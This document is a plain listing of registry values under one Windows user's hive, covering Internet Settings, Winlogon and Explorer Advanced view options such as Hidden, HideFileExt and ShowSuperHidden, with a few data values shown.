HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​SOFTWARE\​Microsoft\​Windows\​CurrentVersion\​Internet Settings  MimeExclusionListForCache  multipart/mixed multipart/x-mixed-replace multipart/x-byteranges  
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​SOFTWARE\​Microsoft\​Windows\​CurrentVersion\​Internet Settings  SecureProtocols  160 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​SOFTWARE\​Microsoft\​Windows\​CurrentVersion\​Internet Settings  WarnOnPost  0x01000000 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​SOFTWARE\​Microsoft\​Windows\​CurrentVersion\​Internet Settings  WarnOnZoneCrossing 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows NT\​CurrentVersion\​Winlogon  ParseAutoexec 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​  ShellState  0x2400000033880000000000000000000000000000010000000d0000000000 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​Advanced  DontPrettyPath 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​Advanced  Filter 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​Advanced  Hidden 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​Advanced  HideFileExt 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​Advanced  HideIcons 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​Advanced  MapNetDrvBtn 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​Advanced  NoNetCrawling 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​Advanced  SeparateProcess 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​Advanced  ShowCompColor 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​Advanced  ShowInfoTip 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​Advanced  ShowSuperHidden 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​Advanced  WebView